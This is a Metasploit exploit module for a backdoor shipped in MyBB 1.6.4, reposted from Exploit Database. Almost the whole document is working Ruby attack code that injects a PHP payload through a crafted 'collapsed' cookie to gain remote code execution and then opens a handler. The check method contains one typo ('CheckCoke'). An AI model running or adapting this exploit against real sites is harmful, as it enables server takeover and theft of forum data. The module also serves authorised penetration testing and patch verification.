MyBB 1.6.4 – Backdoor Access (Metasploit)

• Exploit Database
• 17 阅读

• 作者： Metasploit
  日期： 2011-10-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17949/

• ##
  # $Id: mybb_backdoor.rb 13838 2011-10-09 03:22:07Z todb $
  ##
  
  ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = NormalRanking
  
  	include Msf::Exploit::Remote::HttpClient
  
  	def initialize(info = {})
  		super(update_info(info,
  			'Name' => 'myBB 1.6.4 Backdoor Exploit',
  			'Description'=> %q{
  					myBB is a popular open source PHP forum software. Version 1.6.4 contained an 
  					unauthorized backdoor, distributed as part of the vendor's source package.
  			},
  			'Author'	=>
  				[
  					'tdz',
  				],
  			'License'=> MSF_LICENSE,
  			'Version'=> '$Revision: 13838 $',
  			'References' =>
  				[
  					[ 'BID', '49993'],
  					[ 'SECUNIA', '46300' ],
  					[ 'URL', 'http://blog.mybb.com/2011/10/06/1-6-4-security-vulnerabilit/' ]
  				],
  			'Privileged' => false,
  			'Platform' => ['php'],
  			'Arch' => ARCH_PHP,
  			'Payload'=>
  				{
  					'Space' => 4000,
  					'DisableNops' => true,
  					'Keys'=> ['php'],
  				},
  			'Targets'=> [ ['Automatic', { }], ],
  			'DefaultTarget'=> 0,
  			'DisclosureDate' => 'Oct 06 2011'
  			))
  
  			register_options(
  				[
  					OptString.new('URI',	[ true, "myBB path", '/index.php']),
  				], self.class)
  	end
  
  
  	def uri
  		datastore['URI']
  	end
  
  	def check
  		print_status("Checking target")
  		res = send_request_raw(
  			{'method' => 'GET',
  			'uri' => uri},
  			10
  		)
  		if (not res) or (not res.code.between?(200,299))
  			return Exploit::CheckCode::Safe
  		else
  			return Exploit::CheckCoke::Detected
  		end
  	end
  
  	def exploit
  	
  		print_status("Sending exploit request")
  
  		# See the patch at http://blog.mybb.com/wp-content/uploads/2011/10/mybb_1604_patches.txt
  		# for details of the backdoor mechanism. 
  		cookie = "collapsed=0|1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|17|18|19|20|21|22|"
  		cookie << Rex::Text.uri_encode(payload.encoded)
  		
  		response = send_request_raw({
  			'method'=> 'GET',
  			'global' => true,
  			'uri' => uri,
  			'headers' =>
  				{
  					'Cookie' => cookie,
  				}
  		},10)
  
  		if (not response) or (not response.code.between?(200,299))
  			print_error "Cannot connect to #{uri} on #{datastore['RHOST']}, got #{response ? response.code : 'no response'}."
  		else
  			handler
  		end
  
  	end
  end